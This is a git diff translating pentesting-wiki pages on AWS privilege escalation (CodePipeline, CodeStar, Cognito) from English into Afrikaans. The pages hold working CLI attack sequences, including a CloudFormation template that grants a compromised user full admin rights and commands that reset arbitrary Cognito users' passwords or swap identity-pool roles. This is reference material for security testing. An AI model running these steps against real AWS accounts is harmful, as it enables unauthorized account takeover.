+Wanneer jy 'n code pipeline skep, kan jy 'n **codepipeline IAM Rol om te loop** aandui, daarom kan jy hulle kompromenteer.
 
-Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...)
+Behalwe vir die vorige toestemmings, sal jy **toegang tot die plek waar die kode gestoor word** benodig (S3, ECR, github, bitbucket...)
 
-I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:<several>`
+Ek het dit getoets deur die proses op die webblad te doen, die toestemmings wat voorheen aangedui is, is nie die Lys/Kry een wat benodig word om 'n codepipeline te skep nie, maar om dit op die web te skep, sal jy ook nodig hê: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:<verskeie>`
 
-During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise:
+Tydens die **skepping van die bouprojek** kan jy 'n **opdrag om te loop** aandui (rev shell?) en om die boufase as **bevoegde gebruiker** te laat loop, dit is die konfigurasie wat die aanvaller benodig om te kompromenteer:
 
 ![](<../../../images/image (276).png>)
 
@@ -26,16 +26,12 @@ During the **creation of the build project** you can indicate a **command to run
 
 ### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution`
 
-It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions.
+Dit mag moontlik wees om die rol wat gebruik word en die opdrag wat op 'n codepipeline uitgevoer word, met die vorige toestemmings te wysig.
 
 ### `codepipeline:pollforjobs`
 
-[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html):
+[AWS noem](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html):
 
-> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**.
+> Wanneer hierdie API aangeroep word, **gee CodePipeline tydelike geloofsbriewe vir die S3-bucket** wat gebruik word om artefakte vir die pipeline te stoor, indien die aksie toegang tot daardie S3-bucket vir invoer of uitvoer artefakte benodig. Hierdie API **gee ook enige geheime waardes wat vir die aksie gedefinieer is** terug.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
index 387c6ffff..870c5f76e 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
@@ -4,7 +4,7 @@
 
 ## Codestar
 
-You can find more information about codestar in:
+Jy kan meer inligting oor codestar vind in:
 
 {{#ref}}
 codestar-createproject-codestar-associateteammember.md
@@ -12,7 +12,7 @@ codestar-createproject-codestar-associateteammember.md
 
 ### `iam:PassRole`, `codestar:CreateProject`
 
-With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page:
+Met hierdie toestemmings kan jy **misbruik maak van 'n codestar IAM Rol** om **arbitraire aksies** deur 'n **cloudformation sjabloon** uit te voer. Kyk na die volgende bladsy:
 
 {{#ref}}
 iam-passrole-codestar-createproject.md
@@ -20,14 +20,13 @@ iam-passrole-codestar-createproject.md
 
 ### `codestar:CreateProject`, `codestar:AssociateTeamMember`
 
-This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**.
-
+Hierdie tegniek gebruik `codestar:CreateProject` om 'n codestar projek te skep, en `codestar:AssociateTeamMember` om 'n IAM gebruiker die **eienaar** van 'n nuwe CodeStar **projek** te maak, wat hulle 'n **nuwe beleid met 'n paar ekstra toestemmings** sal gee.
 ```bash
 PROJECT_NAME="supercodestar"
 
 aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
-    --name $PROJECT_NAME \
-    --id $PROJECT_NAME
+--name $PROJECT_NAME \
+--id $PROJECT_NAME
 
 echo "Waiting 1min to start the project"
 sleep 60
@@ -35,15 +34,14 @@ sleep 60
 USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')
 
 aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
-    --project-id $PROJECT_NAME \
-    --user-arn "$USER_ARN" \
-    --project-role "Owner" \
-    --remote-access-allowed
+--project-id $PROJECT_NAME \
+--user-arn "$USER_ARN" \
+--project-role "Owner" \
+--remote-access-allowed
 ```
-
 If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember`
 
-**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in:
+**Potensiële Impak:** Privesc na die codestar beleid wat gegenereer is. Jy kan 'n voorbeeld van daardie beleid vind in:
 
 {{#ref}}
 codestar-createproject-codestar-associateteammember.md
@@ -51,27 +49,23 @@ codestar-createproject-codestar-associateteammember.md
 
 ### `codestar:CreateProjectFromTemplate`
 
-1. **Create a New Project:**
-   - Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project.
-     - Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**.
-     - This access specifically targets a stack associated with the `CodeStarWorker-<generic project name>-CloudFormation` IAM role.
-2. **Update the Target Stack:**
-   - With the granted CloudFormation permissions, proceed to update the specified stack.
-     - The stack's name will typically conform to one of two patterns:
-       - `awscodestar-<generic project name>-infrastructure`
-       - `awscodestar-<generic project name>-lambda`
-       - The exact name depends on the chosen template (referencing the example exploit script).
-3. **Access and Permissions:**
-   - Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack.
-   - Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.
+1. **Skep 'n Nuwe Projek:**
+- Gebruik die **`codestar:CreateProjectFromTemplate`** aksie om die skepping van 'n nuwe projek te begin.
+- Na suksesvolle skepping, word toegang outomaties toegestaan vir **`cloudformation:UpdateStack`**.
+- Hierdie toegang teiken spesifiek 'n stapel wat geassosieer is met die `CodeStarWorker-<generic project name>-CloudFormation` IAM rol.
+2. **Werk die Teiken Stapel Op:**
+- Met die toegewyde CloudFormation toestemmings, gaan voort om die gespesifiseerde stapel op te dateer.
+- Die naam van die stapel sal tipies voldoen aan een van twee patrone:
+- `awscodestar-<generic project name>-infrastructure`
+- `awscodestar-<generic project name>-lambda`
+- Die presiese naam hang af van die gekose sjabloon (verwys na die voorbeeld uitbuitingskrip).
+3. **Toegang en Toestemmings:**
+- Na die opdatering, verkry jy die vermoëns wat aan die **CloudFormation IAM rol** gekoppel is met die stapel.
+- Let op: Dit bied nie inherent volle administrateur voorregte nie. Bykomende verkeerd geconfigureerde hulpbronne binne die omgewing mag benodig word om voorregte verder te verhoog.
 
 For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\
 You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py)
 
-**Potential Impact:** Privesc to cloudformation IAM role.
+**Potensiële Impak:** Privesc na cloudformation IAM rol.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md
index 0de95738e..8f5cf0c89 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md
@@ -2,84 +2,78 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-This is the created policy the user can privesc to (the project name was `supercodestar`):
-
+Dit is die geskepte beleid waartoe die gebruiker kan privesc (die projeknaam was `supercodestar`):
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Sid": "1",
-      "Effect": "Allow",
-      "Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"],
-      "Resource": [
-        "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar",
-        "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent",
-        "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner"
-      ]
-    },
-    {
-      "Sid": "2",
-      "Effect": "Allow",
-      "Action": [
-        "codestar:DescribeUserProfile",
-        "codestar:ListProjects",
-        "codestar:ListUserProfiles",
-        "codestar:VerifyServiceRole",
-        "cloud9:DescribeEnvironment*",
-        "cloud9:ValidateEnvironmentName",
-        "cloudwatch:DescribeAlarms",
-        "cloudwatch:GetMetricStatistics",
-        "cloudwatch:ListMetrics",
-        "codedeploy:BatchGet*",
-        "codedeploy:List*",
-        "codestar-connections:UseConnection",
-        "ec2:DescribeInstanceTypeOfferings",
-        "ec2:DescribeInternetGateways",
-        "ec2:DescribeNatGateways",
-        "ec2:DescribeRouteTables",
-        "ec2:DescribeSecurityGroups",
-        "ec2:DescribeSubnets",
-        "ec2:DescribeVpcs",
-        "events:ListRuleNamesByTarget",
-        "iam:GetAccountSummary",
-        "iam:GetUser",
-        "iam:ListAccountAliases",
-        "iam:ListRoles",
-        "iam:ListUsers",
-        "lambda:List*",
-        "sns:List*"
-      ],
-      "Resource": ["*"]
-    },
-    {
-      "Sid": "3",
-      "Effect": "Allow",
-      "Action": [
-        "codestar:*UserProfile",
-        "iam:GenerateCredentialReport",
-        "iam:GenerateServiceLastAccessedDetails",
-        "iam:CreateAccessKey",
-        "iam:UpdateAccessKey",
-        "iam:DeleteAccessKey",
-        "iam:UpdateSSHPublicKey",
-        "iam:UploadSSHPublicKey",
-        "iam:DeleteSSHPublicKey",
-        "iam:CreateServiceSpecificCredential",
-        "iam:UpdateServiceSpecificCredential",
-        "iam:DeleteServiceSpecificCredential",
-        "iam:ResetServiceSpecificCredential",
-        "iam:Get*",
-        "iam:List*"
-      ],
-      "Resource": ["arn:aws:iam::947247140022:user/${aws:username}"]
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "1",
+"Effect": "Allow",
+"Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"],
+"Resource": [
+"arn:aws:codestar:eu-west-1:947247140022:project/supercodestar",
+"arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent",
+"arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner"
+]
+},
+{
+"Sid": "2",
+"Effect": "Allow",
+"Action": [
+"codestar:DescribeUserProfile",
+"codestar:ListProjects",
+"codestar:ListUserProfiles",
+"codestar:VerifyServiceRole",
+"cloud9:DescribeEnvironment*",
+"cloud9:ValidateEnvironmentName",
+"cloudwatch:DescribeAlarms",
+"cloudwatch:GetMetricStatistics",
+"cloudwatch:ListMetrics",
+"codedeploy:BatchGet*",
+"codedeploy:List*",
+"codestar-connections:UseConnection",
+"ec2:DescribeInstanceTypeOfferings",
+"ec2:DescribeInternetGateways",
+"ec2:DescribeNatGateways",
+"ec2:DescribeRouteTables",
+"ec2:DescribeSecurityGroups",
+"ec2:DescribeSubnets",
+"ec2:DescribeVpcs",
+"events:ListRuleNamesByTarget",
+"iam:GetAccountSummary",
+"iam:GetUser",
+"iam:ListAccountAliases",
+"iam:ListRoles",
+"iam:ListUsers",
+"lambda:List*",
+"sns:List*"
+],
+"Resource": ["*"]
+},
+{
+"Sid": "3",
+"Effect": "Allow",
+"Action": [
+"codestar:*UserProfile",
+"iam:GenerateCredentialReport",
+"iam:GenerateServiceLastAccessedDetails",
+"iam:CreateAccessKey",
+"iam:UpdateAccessKey",
+"iam:DeleteAccessKey",
+"iam:UpdateSSHPublicKey",
+"iam:UploadSSHPublicKey",
+"iam:DeleteSSHPublicKey",
+"iam:CreateServiceSpecificCredential",
+"iam:UpdateServiceSpecificCredential",
+"iam:DeleteServiceSpecificCredential",
+"iam:ResetServiceSpecificCredential",
+"iam:Get*",
+"iam:List*"
+],
+"Resource": ["arn:aws:iam::947247140022:user/${aws:username}"]
+}
+]
 }
 ```
-
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
index 891d72df5..558a37cd6 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
@@ -2,42 +2,39 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**.
-
-To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**:
+Met hierdie toestemmings kan jy **'n codestar IAM Rol misbruik** om **arbitraire aksies** deur 'n **cloudformation sjabloon** uit te voer.
 
+Om dit te benut, moet jy 'n **S3-bucket skep wat toeganklik is** vanaf die aangevalde rekening. Laai 'n lêer genaamd `toolchain.json` op. Hierdie lêer moet die **cloudformation sjabloon uitbuiting** bevat. Die volgende kan gebruik word om 'n bestuurde beleid aan 'n gebruiker onder jou beheer toe te ken en **admin-toestemmings** te gee:
 ```json:toolchain.json
 {
-  "Resources": {
-    "supercodestar": {
-      "Type": "AWS::IAM::ManagedPolicy",
-      "Properties": {
-        "ManagedPolicyName": "CodeStar_supercodestar",
-        "PolicyDocument": {
-          "Version": "2012-10-17",
-          "Statement": [
-            {
-              "Effect": "Allow",
-              "Action": "*",
-              "Resource": "*"
-            }
-          ]
-        },
-        "Users": ["<compromised username>"]
-      }
-    }
-  }
+"Resources": {
+"supercodestar": {
+"Type": "AWS::IAM::ManagedPolicy",
+"Properties": {
+"ManagedPolicyName": "CodeStar_supercodestar",
+"PolicyDocument": {
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": "*",
+"Resource": "*"
+}
+]
+},
+"Users": ["<compromised username>"]
+}
+}
+}
 }
 ```
-
-Also **upload** this `empty zip` file to the **bucket**:
+Ook **laai** hierdie `leë zip` lêer op na die **houer**:
 
 {% file src="../../../../images/empty.zip" %}
 
-Remember that the **bucket with both files must be accessible by the victim account**.
-
-With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project:
+Onthou dat die **houer met albei lêers toeganklik moet wees deur die slagoffer rekening**.
 
+Met albei dinge opgelaai kan jy nou voortgaan met die **uitbuiting** deur 'n **codestar** projek te skep:
 ```bash
 PROJECT_NAME="supercodestar"
 
@@ -45,19 +42,19 @@ PROJECT_NAME="supercodestar"
 ## In this JSON the bucket and key (path) to the empry.zip file is used
 SOURCE_CODE_PATH="/tmp/surce_code.json"
 SOURCE_CODE="[
-    {
-        \"source\": {
-            \"s3\": {
-                \"bucketName\": \"privesc\",
-                \"bucketKey\": \"empty.zip\"
-            }
-    },
-        \"destination\": {
-            \"codeCommit\": {
-                \"name\": \"$PROJECT_NAME\"
-            }
-        }
-    }
+{
+\"source\": {
+\"s3\": {
+\"bucketName\": \"privesc\",
+\"bucketKey\": \"empty.zip\"
+}
+},
+\"destination\": {
+\"codeCommit\": {
+\"name\": \"$PROJECT_NAME\"
+}
+}
+}
 ]"
 printf "$SOURCE_CODE" > $SOURCE_CODE_PATH
 
@@ -65,28 +62,23 @@ printf "$SOURCE_CODE" > $SOURCE_CODE_PATH
 ## In this JSON the bucket and key (path) to the toolchain.json file is used
 TOOLCHAIN_PATH="/tmp/tool_chain.json"
 TOOLCHAIN="{
-    \"source\": {
-        \"s3\": {
-            \"bucketName\": \"privesc\",
-            \"bucketKey\": \"toolchain.json\"
-        }
-    },
-    \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\"
+\"source\": {
+\"s3\": {
+\"bucketName\": \"privesc\",
+\"bucketKey\": \"toolchain.json\"
+}
+},
+\"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\"
 }"
 printf "$TOOLCHAIN" > $TOOLCHAIN_PATH
 
 # Create the codestar project that will use the cloudformation epxloit to privesc
 aws codestar create-project \
-    --name $PROJECT_NAME \
-    --id $PROJECT_NAME \
-    --source-code file://$SOURCE_CODE_PATH \
-    --toolchain file://$TOOLCHAIN_PATH
+--name $PROJECT_NAME \
+--id $PROJECT_NAME \
+--source-code file://$SOURCE_CODE_PATH \
+--toolchain file://$TOOLCHAIN_PATH
 ```
-
-This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user.
+Hierdie exploit is gebaseer op die **Pacu exploit van hierdie voorregte**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) Daarop kan jy 'n variasie vind om 'n admin bestuurde beleid vir 'n rol te skep in plaas van vir 'n gebruiker.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md
index ddd0c1efd..774f1a6c4 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md
@@ -4,28 +4,27 @@
 
 ## Cognito
 
-For more info about Cognito check:
+Vir meer inligting oor Cognito, kyk:
 
 {{#ref}}
 ../aws-services/aws-cognito-enum/
 {{#endref}}
 
-### Gathering credentials from Identity Pool
+### Versameling van akrediteerbare uit Identiteitspoel
 
-As Cognito can grant **IAM role credentials** to both **authenticated** an **unauthenticated** **users**, if you locate the **Identity Pool ID** of an application (should be hardcoded on it) you can obtain new credentials and therefore privesc (inside an AWS account where you probably didn't even have any credential previously).
+Aangesien Cognito **IAM rol akrediteerbare** aan beide **geverifieerde** en **ongeverifieerde** **gebruikers** kan toeken, as jy die **Identiteitspoel ID** van 'n toepassing kan vind (dit behoort hardgecodeer te wees), kan jy nuwe akrediteerbare verkry en dus privesc (binne 'n AWS-rekening waar jy waarskynlik glad nie enige akrediteerbare gehad het nie).
 
-For more information [**check this page**](../aws-unauthenticated-enum-access/#cognito).
+Vir meer inligting [**kyk hierdie bladsy**](../aws-unauthenticated-enum-access/#cognito).
 
-**Potential Impact:** Direct privesc to the services role attached to unauth users (and probably to the one attached to auth users).
+**Potensiële Impak:** Direkte privesc na die dienste rol wat aan ongeverifieerde gebruikers geheg is (en waarskynlik na die een wat aan geverifieerde gebruikers geheg is).
 
 ### `cognito-identity:SetIdentityPoolRoles`, `iam:PassRole`
 
-With this permission you can **grant any cognito role** to the authenticated/unauthenticated users of the cognito app.
-
+Met hierdie toestemming kan jy **enige cognito rol** aan die geverifieerde/ongeverifieerde gebruikers van die cognito toepassing toeken.
 ```bash
 aws cognito-identity set-identity-pool-roles \
-    --identity-pool-id <identity_pool_id> \
-    --roles unauthenticated=<role ARN>
+--identity-pool-id <identity_pool_id> \
+--roles unauthenticated=<role ARN>
 
 # Get credentials
 ## Get one ID
@@ -33,286 +32,243 @@ aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-90
 ## Get creds for that id
 aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374"
 ```
+As die cognito-app **nie ongemagtigde gebruikers geaktiveer het nie**, mag jy ook die toestemming `cognito-identity:UpdateIdentityPool` nodig hê om dit te aktiveer.
 
-If the cognito app **doesn't have unauthenticated users enabled** you might need also the permission `cognito-identity:UpdateIdentityPool` to enable it.
-
-**Potential Impact:** Direct privesc to any cognito role.
+**Potensiële Impak:** Direkte privesc na enige cognito-rol.
 
 ### `cognito-identity:update-identity-pool`
 
-An attacker with this permission could set for example a Cognito User Pool under his control or any other identity provider where he can login as a **way to access this Cognito Identity Pool**. Then, just **login** on that user provider will **allow him to access the configured authenticated role in the Identity Pool**.
-
+'n Aanvaller met hierdie toestemming kan byvoorbeeld 'n Cognito User Pool onder sy beheer stel of enige ander identiteitsverskaffer waar hy kan aanmeld as 'n **manier om toegang te verkry tot hierdie Cognito Identity Pool**. Dan, net **aanmeld** op daardie gebruikersverskaffer sal **hom toelaat om toegang te verkry tot die geconfigureerde gemagtigde rol in die Identity Pool**.
 ```bash
 # This example is using a Cognito User Pool as identity provider
 ## but you could use any other identity provider
 aws cognito-identity update-identity-pool \
-    --identity-pool-id <value> \
-    --identity-pool-name <value> \
-    [--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \
-    --cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false
+--identity-pool-id <value> \
+--identity-pool-name <value> \
+[--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \
+--cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false
 
 # Now you need to login to the User Pool you have configured
 ## after having the id token of the login continue with the following commands:
 
 # In this step you should have already an ID Token
 aws cognito-identity get-id \
-    --identity-pool-id <id_pool_id> \
-    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+--identity-pool-id <id_pool_id> \
+--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
 # Get the identity_id from thr previous commnad response
 aws cognito-identity get-credentials-for-identity \
-    --identity-id <identity_id> \
-    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+--identity-id <identity_id> \
+--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 ```
-
-It's also possible to **abuse this permission to allow basic auth**:
-
+Dit is ook moontlik om **hierdie toestemming te misbruik om basiese outentisering toe te laat**:
 ```bash
 aws cognito-identity update-identity-pool \
-    --identity-pool-id <value> \
-    --identity-pool-name <value> \
-    --allow-unauthenticated-identities
-    --allow-classic-flow
+--identity-pool-id <value> \
+--identity-pool-name <value> \
+--allow-unauthenticated-identities
+--allow-classic-flow
 ```
-
-**Potential Impact**: Compromise the configured authenticated IAM role inside the identity pool.
+**Potensiële Impak**: Kompromitteer die geconfigureerde geverifieerde IAM-rol binne die identiteitspoel.
 
 ### `cognito-idp:AdminAddUserToGroup`
 
-This permission allows to **add a Cognito user to a Cognito group**, therefore an attacker could abuse this permission to add an user under his control to other groups with **better** privileges or **different IAM roles**:
-
+Hierdie toestemming laat toe om **'n Cognito-gebruiker aan 'n Cognito-groep toe te voeg**, daarom kan 'n aanvaller hierdie toestemming misbruik om 'n gebruiker onder sy beheer aan ander groepe met **beter** bevoegdhede of **verskillende IAM-rolle** toe te voeg:
 ```bash
 aws cognito-idp admin-add-user-to-group \
-    --user-pool-id <value> \
-    --username <value> \
-    --group-name <value>
+--user-pool-id <value> \
+--username <value> \
+--group-name <value>
 ```
-
-**Potential Impact:** Privesc to other Cognito groups and IAM roles attached to User Pool Groups.
+**Potensiële Impak:** Privesc na ander Cognito groepe en IAM rolle wat aan Gebruiker Pool Groepe gekoppel is.
 
 ### (`cognito-idp:CreateGroup` | `cognito-idp:UpdateGroup`), `iam:PassRole`
 
-An attacker with these permissions could **create/update groups** with **every IAM role that can be used by a compromised Cognito Identity Provider** and make a compromised user part of the group, accessing all those roles:
-
+'n Aanvaller met hierdie toestemmings kan **groepe skep/opdateer** met **elke IAM rol wat deur 'n gecompromitteerde Cognito Identiteitsverskaffer gebruik kan word** en 'n gecompromitteerde gebruiker deel van die groep maak, wat toegang tot al daardie rolle verkry:
 ```bash
 aws cognito-idp create-group --group-name Hacked --user-pool-id <user-pool-id> --role-arn <role-arn>
 ```
-
-**Potential Impact:** Privesc to other Cognito IAM roles.
+**Potensiële Impak:** Privesc na ander Cognito IAM rolle.
 
 ### `cognito-idp:AdminConfirmSignUp`
 
-This permission allows to **verify a signup**. By default anyone can sign in Cognito applications, if that is left, a user could create an account with any data and verify it with this permission.
-
+Hierdie toestemming laat toe om **'n aanmelding te verifieer**. Standaard kan enigiemand in Cognito toepassings aanmeld, as dit gelaat word, kan 'n gebruiker 'n rekening met enige data skep en dit met hierdie toestemming verifieer.
 ```bash
 aws cognito-idp admin-confirm-sign-up \
-    --user-pool-id <value> \
-    --username <value>
+--user-pool-id <value> \
+--username <value>
 ```
-
-**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users if you can register a new user. Indirect privesc to other app functionalities being able to confirm any account.
+**Potensiële Impak:** Indirekte privesc na die identiteitspoel IAM rol vir geverifieerde gebruikers as jy 'n nuwe gebruiker kan registreer. Indirekte privesc na ander app-funksies deur enige rekening te kan bevestig.
 
 ### `cognito-idp:AdminCreateUser`
 
-This permission would allow an attacker to create a new user inside the user pool. The new user is created as enabled, but will need to change its password.
-
+Hierdie toestemming sal 'n aanvaller in staat stel om 'n nuwe gebruiker binne die gebruikerspoel te skep. Die nuwe gebruiker word as geaktiveer geskep, maar sal sy wagwoord moet verander.
 ```bash
 aws cognito-idp admin-create-user \
-    --user-pool-id <value> \
-    --username <value> \
-    [--user-attributes <value>] ([Name=email,Value=email@gmail.com])
-    [--validation-data <value>]
-    [--temporary-password <value>]
+--user-pool-id <value> \
+--username <value> \
+[--user-attributes <value>] ([Name=email,Value=email@gmail.com])
+[--validation-data <value>]
+[--temporary-password <value>]
 ```
-
-**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user
+**Potensiële Impak:** Direkte privesc na die identiteitspoel IAM rol vir geverifieerde gebruikers. Indirekte privesc na ander app funksies deur enige gebruiker te kan skep.
 
 ### `cognito-idp:AdminEnableUser`
 
-This permissions can help in. a very edge-case scenario where an attacker found the credentials of a disabled user and he needs to **enable it again**.
-
+Hierdie toestemmings kan help in 'n baie randgeval waar 'n aanvaller die akrediteer van 'n gedeaktiveerde gebruiker gevind het en hy moet dit **weer aktiveer**.
 ```bash
 aws cognito-idp admin-enable-user \
-    --user-pool-id <value> \
-    --username <value>
+--user-pool-id <value> \
+--username <value>
 ```
-
-**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users and permissions of the user if the attacker had credentials for a disabled user.
+**Potensiële Impak:** Indirekte privesc na die identiteitspoel IAM rol vir geverifieerde gebruikers en toestemmings van die gebruiker as die aanvaller kredensiale vir 'n gedeaktiveerde gebruiker gehad het.
 
 ### `cognito-idp:AdminInitiateAuth`, **`cognito-idp:AdminRespondToAuthChallenge`**
 
-This permission allows to login with the [**method ADMIN_USER_PASSWORD_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** For more information follow the link.
+Hierdie toestemming laat toe om in te log met die [**metode ADMIN_USER_PASSWORD_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** Vir meer inligting volg die skakel.
 
 ### `cognito-idp:AdminSetUserPassword`
 
-This permission would allow an attacker to **change the password of any user**, making him able to impersonate any user (that doesn't have MFA enabled).
-
+Hierdie toestemming sou 'n aanvaller in staat stel om **die wagwoord van enige gebruiker te verander**, wat hom in staat stel om enige gebruiker na te doen (wat nie MFA geaktiveer het nie).
 ```bash
 aws cognito-idp admin-set-user-password \
-    --user-pool-id <value> \
-    --username <value> \
-    --password <value> \
-    --permanent
+--user-pool-id <value> \
+--username <value> \
+--password <value> \
+--permanent
 ```
-
-**Potential Impact:** Direct privesc to potentially any user, so access to all the groups each user is member of and access to the Identity Pool authenticated IAM role.
+**Potensiële Impak:** Direkte privesc na potensieel enige gebruiker, sodat toegang tot al die groepe waartoe elke gebruiker behoort en toegang tot die Identiteitspoel geverifieerde IAM-rol.
 
 ### `cognito-idp:AdminSetUserSettings` | `cognito-idp:SetUserMFAPreference` | `cognito-idp:SetUserPoolMfaConfig` | `cognito-idp:UpdateUserPool`
 
-**AdminSetUserSettings**: An attacker could potentially abuse this permission to set a mobile phone under his control as **SMS MFA of a user**.
-
